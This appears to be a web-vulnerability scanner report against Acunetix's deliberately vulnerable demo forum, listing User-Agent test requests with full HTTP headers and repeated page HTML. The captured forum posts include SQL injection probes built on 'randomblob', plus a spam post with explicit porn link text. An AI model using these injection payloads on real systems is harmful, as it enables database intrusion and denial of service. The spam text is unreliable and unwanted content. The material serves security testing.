<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 392 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:13 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 450 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:14 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 355 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:13 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:18 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:18 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is 